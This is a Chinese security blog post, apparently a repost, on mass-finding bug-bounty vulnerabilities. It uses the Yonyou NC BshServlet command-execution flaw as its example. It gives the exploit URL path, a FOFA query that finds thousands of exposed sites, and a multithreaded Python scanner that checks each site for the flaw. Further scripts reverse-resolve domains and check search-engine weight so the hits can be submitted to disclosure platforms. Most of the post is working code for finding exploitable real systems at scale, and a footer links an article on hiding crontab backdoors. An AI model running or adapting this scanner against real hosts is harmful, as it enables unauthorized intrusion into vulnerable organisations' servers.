src漏洞的批量挖掘分享

admin 2022年7月8日18:37:17安全文章评论8 views8917字阅读29分43秒阅读模式

¶前言

本篇博文只谈漏洞的利用和批量挖掘。
在接触src之前,我和很多师傅都有同一个疑问,就是那些大师傅是怎么批量挖洞的?摸滚打爬了两个月之后,我渐渐有了点自己的理解和经验,所以打算分享出来和各位师傅交流,不足之处还望指正。

¶漏洞举例

这里以前几天爆出来的用友nc的命令执行漏洞为例

CODE

1
http://x.x.x.x/servlet//~ic/bsh.servlet.BshServlet


src漏洞的批量挖掘分享

文本框里可以命令执行


src漏洞的批量挖掘分享

¶漏洞的批量检测

在知道这个漏洞详情之后,我们需要根据漏洞的特征去fofa里寻找全国范围里使用这个系统的网站,比如用友nc在fofa的搜索特征就是

CODE

1
app="用友-UFIDA-NC"

src漏洞的批量挖掘分享

可以看到一共有9119条结果,接下来我们需要采集所有站点的地址下来,这里推荐狼组安全团队开发的fofa采集工具fofa-viewer

CODE

1
github地址:https://github.com/wgpsec/fofa_viewer

src漏洞的批量挖掘分享

然后导出所有站点到一个txt文件中
根据用友nc漏洞命令执行的特征,我们简单写一个多线程检测脚本

PYTHON

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/5/10 9:16
# blog: www.wlhhlc.top
import requests
import threadpool
import os

def exp(url):
    """Probe *url* for the Yonyou NC BshServlet remote-command-execution flaw.

    Appends the BeanShell servlet path to the base url; a response body
    containing "BeanShell" means the debug servlet is exposed. Vulnerable
    urls are printed and appended to the result file.
    """
    poc = r"""/servlet//~ic/bsh.servlet.BshServlet"""
    url = url + poc
    try:
        res = requests.get(url, timeout=3)
        if "BeanShell" in res.text:
            print("[*]存在漏洞的url:" + url)
            with open("用友命令执行列表.txt", 'a') as f:
                # was "n": the newline escape was lost in transcription
                f.write(url + "\n")
    except requests.RequestException:
        # Unreachable/slow hosts are expected during a bulk scan; skip them.
        pass

def multithreading(funcname, params=[], filename="yongyou.txt", pools=10):
    """Run *funcname* once per line of *filename* on a thread pool.

    Each work item is [line] + params; *params* is read-only here, so the
    mutable default is harmless (kept for interface compatibility).
    """
    works = []
    with open(filename, "r") as f:
        for line in f:
            # was rstrip("n"): stripped the letter 'n', not the newline
            func_params = [line.rstrip("\n")] + params
            works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(funcname, works)
    for req in reqs:
        pool.putRequest(req)
    pool.wait()

def main():
    """Truncate any previous result file, then scan every url in yongyou.txt."""
    if os.path.exists("用友命令执行列表.txt"):
        # Opening in 'w' mode truncates; the original leaked the handle.
        with open("用友命令执行列表.txt", 'w'):
            pass
    multithreading(exp, [], "yongyou.txt", 10)

if __name__ == '__main__':
    main()

src漏洞的批量挖掘分享

运行完后得到所有漏洞站点的txt文件

src漏洞的批量挖掘分享

¶域名和权重的批量检测

在我们提交补天等漏洞平台时,不免注意到有这么一个规则,公益漏洞的提交需要满足站点的百度权重或者移动权重大于等于1,亦或者谷歌权重大于等于3的条件,补天漏洞平台以爱站的检测权重为准

CODE

1
https://rank.aizhan.com/

src漏洞的批量挖掘分享

首先我们需要对收集过来的漏洞列表做一个ip反查域名,来证明归属,我们用爬虫写一个批量ip反查域名脚本
这里用了ip138和爱站两个站点来进行ip反查域名
因为多线程会被ban,目前只采用了单线程

PYTHON

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/6/2 22:39
# blog: www.wlhhlc.top
import re, time
import requests
from fake_useragent import UserAgent
from tqdm import tqdm
import os
# ip138 reverse-IP lookup
def ip138_chaxun(ip, ua):
    """Reverse-lookup domains for *ip* via site.ip138.com.

    Returns a list of domain strings scraped from the result page, or
    None when the lookup fails or the site reports no result.
    """
    ip138_headers = {
        'Host': 'site.ip138.com',
        'User-Agent': ua.random,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate, br',
        'Referer': 'https://site.ip138.com/'}
    ip138_url = 'https://site.ip138.com/' + str(ip) + '/'
    try:
        ip138_res = requests.get(url=ip138_url, headers=ip138_headers, timeout=2).text
        if '<li>暂无结果</li>' not in ip138_res:
            result_site = re.findall(r"""</span><a href="/(.*?)/" target="_blank">""", ip138_res)
            return result_site
    except Exception:
        # Network/parse failures during bulk lookups mean "no result".
        pass
    return None

# aizhan reverse-IP lookup
def aizhan_chaxun(ip, ua):
    """Reverse-lookup domains for *ip* via dns.aizhan.com.

    Returns a list of domain strings when the page reports at least one
    binding, otherwise None (including on any network/parse failure).
    """
    aizhan_headers = {
        'Host': 'dns.aizhan.com',
        'User-Agent': ua.random,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding': 'gzip, deflate, br',
        'Referer': 'https://dns.aizhan.com/'}
    aizhan_url = 'https://dns.aizhan.com/' + str(ip) + '/'
    try:
        aizhan_r = requests.get(url=aizhan_url, headers=aizhan_headers, timeout=2).text
        # First <span class="red"> holds the number of bound domains.
        aizhan_nums = re.findall(r'''<span class="red">(.*?)</span>''', aizhan_r)
        if int(aizhan_nums[0]) > 0:
            aizhan_domains = re.findall(r'''rel="nofollow" target="_blank">(.*?)</a>''', aizhan_r)
            return aizhan_domains
    except Exception:
        # IndexError/ValueError on an unexpected page also lands here.
        pass
    return None


def catch_result(i):
    """Reverse-resolve the ip of one url line and record the outcome.

    Successful lookups go to "ip反查结果.txt" in the form
    "[url]:<url> [ip138]:<list> [aizhan]:<list>"; failures are appended
    to "反查失败列表.txt".
    """
    ua_header = UserAgent()
    i = i.strip()
    try:
        # Lines look like "http://x.x.x.x[:port]"; extract the host part.
        ip = i.split(':')[1].split('//')[1]
        ip138_result = ip138_chaxun(ip, ua_header)
        aizhan_result = aizhan_chaxun(ip, ua_header)
        time.sleep(1)  # throttle: both sites ban rapid queries
        if (ip138_result is not None and ip138_result != []) or aizhan_result is not None:
            with open("ip反查结果.txt", 'a') as f:
                # NOTE(review): the "[url]:" marker was garbled in the
                # published source; restored here because the downstream
                # get_data() step splits on it.
                result = "[url]:" + i + " " + "[ip138]:" + str(ip138_result) + " [aizhan]:" + str(aizhan_result)
                print(result)
                f.write(result + "\n")  # was "n": lost newline escape
        else:
            with open("反查失败列表.txt", 'a') as f:
                f.write(i + "\n")
    except Exception:
        # Malformed lines are skipped; this is a best-effort batch pass.
        pass

if __name__ == '__main__':
    # Read the vulnerable-url list once (the original opened it twice and
    # never closed either handle).
    with open("用友命令执行列表.txt", 'r') as src:
        url_list = src.readlines()
    # Truncate both output files from any previous run.
    for name in ("反查失败列表.txt", "ip反查结果.txt"):
        if os.path.exists(name):
            open(name, 'w').close()
    # Single-threaded on purpose: both lookup sites ban concurrent clients.
    for i in tqdm(url_list):
        catch_result(i)

运行结果:

src漏洞的批量挖掘分享

然后拿到解析的域名后,就是对域名权重进行检测,这里采用爱站来进行权重检测,继续写一个批量检测脚本

PYTHON

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/6/2 23:39
# blog: www.wlhhlc.top
import re
import threadpool
import urllib.parse
import urllib.request
import ssl
from urllib.error import HTTPError
import time
import tldextract
from fake_useragent import UserAgent
import os
import requests
ssl._create_default_https_context = ssl._create_stdlib_context

# Result lines with non-zero Baidu PC/mobile weight (written out directly).
bd_mb = []
# Result lines with zero Baidu weight; re-checked against Google PR later.
gg = []
# 0 during the first detection pass, 1 while re-checking fail.txt entries.
# (The module-level `global` statement is a no-op but kept as-is.)
global flag
flag = 0

# Data cleaning: normalize raw reverse-lookup lines into domain.txt.
def get_data():
    """Reduce each reverse-lookup result to a registered domain.

    Input lines look like "[url]:<url> [ip138]:<list> [aizhan]:<list>".
    The first resolved domain (ip138 preferred, aizhan as fallback) is
    reduced to its registered domain and written to domain.txt as
    "[url]:<url>\\t[domain]:http://www.<domain>".
    """
    with open("ip反查结果.txt") as src:
        url_list = src.readlines()
    with open("domain.txt", 'w') as f:
        for i in url_list:
            i = i.strip()
            res = i.split('[ip138]:')[1].split('[aizhan]')[0].split(",")[0].strip()
            if res == 'None' or res == '[]':
                # ip138 found nothing; fall back to the aizhan result.
                res = i.split('[aizhan]:')[1].split(",")[0].strip()
            if res != '[]':
                # Strip list-repr punctuation (quotes and brackets); the
                # published source garbled this character class.
                res = re.sub(r"['\[\]]", '', res)
                ext = tldextract.extract(res)
                # NOTE(review): "[url]:" marker reconstructed — it was
                # garbled in the published source.
                res1 = i.split('[url]:')[1].split('[ip138]')[0].strip()
                res2 = "http://www." + '.'.join(ext[1:])
                result = '[url]:' + res1 + '\t' + '[domain]:' + res2
                f.write(result + "\n")

def getPc(domain, _retries=3):
    """Return the Baidu PC weight string for *domain* via aizhan's text API.

    Retries up to *_retries* times on HTTPError (the original recursed
    without bound) and re-raises on persistent failure so seo() records
    the target in fail.txt.
    """
    ua_header = UserAgent()
    headers = {
        'Host': 'baidurank.aizhan.com',
        'User-Agent': ua_header.random,
        'Sec-Fetch-Dest': 'document',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Cookie': ''
    }
    aizhan_pc = 'https://baidurank.aizhan.com/api/br?domain={}&style=text'.format(domain)
    try:
        req = urllib.request.Request(aizhan_pc, headers=headers)
        response = urllib.request.urlopen(req, timeout=10)
        body = response.read().decode("utf8")
        # The text-style endpoint wraps the weight value in an <a> tag.
        result_pc = re.findall(re.compile(r'>(.*?)</a>'), body)
        return result_pc[0]
    except HTTPError:
        if _retries <= 0:
            raise
        time.sleep(3)
        return getPc(domain, _retries - 1)

def getMobile(domain, _retries=3):
    """Return the Baidu mobile weight string for *domain* via aizhan's API.

    Same contract as getPc(): bounded retries on HTTPError (the original
    recursed without bound), re-raising on persistent failure.
    """
    ua_header = UserAgent()
    headers = {
        'Host': 'baidurank.aizhan.com',
        'User-Agent': ua_header.random,
        'Sec-Fetch-Dest': 'document',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Cookie': ''
    }
    aizhan_pc = 'https://baidurank.aizhan.com/api/mbr?domain={}&style=text'.format(domain)
    try:
        req = urllib.request.Request(aizhan_pc, headers=headers)
        response = urllib.request.urlopen(req, timeout=10)
        body = response.read().decode("utf8")
        result_m = re.findall(re.compile(r'>(.*?)</a>'), body)
        return result_m[0]
    except HTTPError:
        if _retries <= 0:
            raise
        time.sleep(3)
        return getMobile(domain, _retries - 1)
# Weight lookup and bucketing
def seo(domain, url):
    """Fetch Baidu PC/mobile weights for *domain* and bucket the result.

    Non-zero weights are appended to bd_mb; double-zero weights go to gg
    for the later Google PR pass. On lookup failure the url is written to
    fail.txt (first pass only, per the global ``flag``) and False is
    returned.
    """
    try:
        result_pc = getPc(domain)
        result_mobile = getMobile(domain)
    except Exception:
        if flag == 0:
            print('[!] 目标{}检测失败,已写入fail.txt等待重新检测'.format(url))
            print(domain)
            with open('fail.txt', 'a', encoding='utf-8') as o:
                o.write(url + '\n')  # was 'n': lost newline escape
        else:
            print('[!!]目标{}第二次检测失败'.format(url))
        # The original fell through and hit a NameError on result_pc here
        # (silently swallowed by the caller); bail out explicitly instead.
        return False
    result = '[+] 百度权重:' + result_pc + ' 移动权重:' + result_mobile + ' ' + url
    print(result)
    if result_pc == '0' and result_mobile == '0':
        gg.append(result)
    else:
        bd_mb.append(result)
    return True

def exp(url):
    """Pull the registered domain out of a '[domain]:' line and run seo()."""
    try:
        raw_domain = url.split('[domain]:')[1]
        parts = tldextract.extract(raw_domain)
        registered = '.'.join(parts[1:])
        seo(registered, url)
    except Exception:
        # Lines without a usable domain are skipped (best-effort batch run).
        pass

def multithreading(funcname, params=[], filename="domain.txt", pools=15):
    """Run *funcname* once per line of *filename* on a thread pool.

    Each work item is [line] + params; *params* is read-only here, so the
    mutable default is harmless (kept for interface compatibility).
    """
    works = []
    with open(filename, "r") as f:
        for line in f:
            # was rstrip("n"): stripped the letter 'n', not the newline
            func_params = [line.rstrip("\n")] + params
            works.append((func_params, None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(funcname, works)
    for req in reqs:
        pool.putRequest(req)
    pool.wait()

def google_simple(url, j, _retries=3):
    """Scrape the Google PR for *url* from pr.aizhan.com.

    Returns (result_line, bz) where bz is 1 when the PR is positive.
    Network failures are retried up to *_retries* times (the original
    recursed without bound); parse failures report the offending target.
    """
    google_pc = "https://pr.aizhan.com/{}/".format(url)
    bz = 0
    http_or_find = 0
    try:
        response = requests.get(google_pc, timeout=10).text
        http_or_find = 1  # page fetched; any later error is a parse error
        result_pc = re.findall(re.compile(r'<span>谷歌PR:</span><a>(.*?)/></a>'), response)[0]
        result_num = result_pc.split('alt="')[1].split('"')[0].strip()
        if int(result_num) > 0:
            bz = 1
        result = '[+] 谷歌权重:' + result_num + ' ' + j
        return result, bz
    except Exception:
        if http_or_find != 0:
            # Was '+ "j"': printed the literal letter j instead of the target.
            result = "[!]格式错误:" + j
            return result, bz
        if _retries <= 0:
            return "[!]请求失败:" + j, bz
        time.sleep(3)
        return google_simple(url, j, _retries - 1)

def exec_function():
    """Drive the weight checks: first pass, retry of failures, Google PR pass.

    Writes Baidu-weighted targets and positive Google-PR targets to
    权重列表.txt.
    """
    # Truncate (or create) fail.txt for this run; both branches of the
    # original did the same thing and leaked the handle.
    open("fail.txt", 'w', encoding='utf-8').close()
    multithreading(exp, [], "domain.txt", 15)
    with open("fail.txt", 'r') as fh:
        fail_url_list = fh.readlines()
    if len(fail_url_list) > 0:
        print("*" * 12 + "正在开始重新检测失败的url" + "*" * 12)
        global flag
        flag = 1  # second pass: seo() reports instead of re-queuing
        multithreading(exp, [], "fail.txt", 15)
    with open("权重列表.txt", 'w', encoding="utf-8") as f:
        for i in bd_mb:
            f.write(i + "\n")  # was "n": lost newline escape
        f.write("\n")
        f.write("-" * 25 + "开始检测谷歌的权重" + "-" * 25 + "\n")
        f.write("\n")
        print("*" * 12 + "正在开始检测谷歌的权重" + "*" * 12)
        for j in gg:
            main_domain = j.split('[domain]:')[1]
            ext = tldextract.extract(main_domain)
            domain = "www." + '.'.join(ext[1:])
            google_result, bz = google_simple(domain, j)
            time.sleep(1)  # throttle requests to aizhan
            print(google_result)
            if bz == 1:
                f.write(google_result + "\n")
    print("检测完成,已保存txt在当前目录下")
def main():
    # Clean raw reverse-lookup output into domain.txt, then run all
    # weight checks (Baidu PC/mobile, then Google PR for zero-weight hits).
    get_data()
    exec_function()

if __name__ == "__main__":
    main()



src漏洞的批量挖掘分享

src漏洞的批量挖掘分享

src漏洞的批量挖掘分享

¶漏洞提交

最后就是一个个拿去提交漏洞了

src漏洞的批量挖掘分享

¶结尾

文中所写脚本还处于勉强能用的状态,后续会进行优化更改。师傅们如有需要也可选择自行更改。

作者:dota_st

原文地址:https://www.wlhhlc.top/posts/997/

渗透测试常用武器分享 第五期(SRC批量工具)

渗透测试常用武器分享 (信息收集)

渗透测试常用武器分享 第二期(泄露扫描)

linux-隐藏你的crontab后门

[] - BurpSuiteTips

 - 

linux+



原文始发于微信公众号(渗透测试教程):src漏洞的批量挖掘分享

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月8日18:37:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  src漏洞的批量挖掘分享 http://cn-sec.com/archives/1166444.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: